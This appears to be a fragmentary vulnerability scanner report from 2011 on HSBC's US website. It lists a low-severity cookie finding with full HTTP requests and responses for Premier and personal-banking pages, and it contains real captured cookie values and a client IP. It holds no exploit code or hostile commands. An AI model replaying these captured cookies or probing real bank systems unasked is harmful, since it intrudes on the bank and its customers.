HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:17 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:17 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000zaHLMq9hdAup3Wxlb5hlayz:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:17 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 31935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:22 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/investment HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:22 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:22 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=00000rTGspoTiHDkPL7HoIVIl8O:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:22 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 42944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:09 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/online HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:09 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:09 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000Z4BL-jm4Iyug9ATd-ZHfaNg:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:09 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 25980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:22 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/privileges HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:22 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:22 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=00008GkbMN-lq2sC8h0WvXE42vp:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:22 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 40792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:32 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/products HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:32 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:32 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000tSiEP2UjzzszGvKqkH6oDv8:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:32 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 37906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:33 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/products/checking HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:34 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:34 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000K5e19lxsL9rl6HyPKYS1Vtw:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:33 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 36108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:43 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/products/loans HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:43 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:43 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000zLBu5-ZGn_ZPmzij6nPWjLd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:43 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 37892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:42 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/products/savings HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:41 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:42 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000VG7g5uCinhKHPYLoC3m6Y-A:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:42 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/3/hsbcpremier/prom/jan-11 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:02 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:02 GMT Vary: User-Agent,Cookie Content-Length: 26320 Set-Cookie: USIB2G=0000hYzy0D1CQLPWUdyKLa1sihz:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/3/hsbcpremier/prom/jul-10/ HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:05 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:05 GMT Vary: User-Agent,Cookie Content-Length: 9805 Set-Cookie: USIB2G=0000uV_CiqaIrjXN-g0VaKNaNAc:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; Expires=Tue, 02 Feb 2016 16:00:13 GMT; Path=/
www.us.hsbc.com-VH=63510956.20992.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263 HTTP/1.1 Host: www.us.hsbc.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:00:13 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 16:01:13 GMT Vary: User-Agent,Cookie Content-Length: 9805 Set-Cookie: USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq; Path=/ Set-Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; Expires=Tue, 02 Feb 2016 16:00:13 GMT; Path=/ S: hbus-vh502_1 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: www.us.hsbc.com-VH=63510956.20992.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:31 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/hsbcpremier/worldwide HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:31 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:31 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000889--KYhrWRXG4tIc57Zlai:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:31 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 37020
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:52 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/international-services/bank/prem-services HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:52 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:52 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000wOC8RQhTEEsUmcdCwwO7df2:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:52 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 33587
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:24 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:24 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:24 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=000018r9SctisOCHQ6yKYya5ErD:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:24 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 55195
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:55 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/about HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:55 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:55 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000iwa7nq-jmJRruRl4H9JnXei:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:55 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 43000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:07 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/inside/about/hsbc-worldwide HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:07 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:07 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000Jrr53m1I6sDAU_mSJNv-gkC:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:07 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 67370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:14 GMT; Path=/
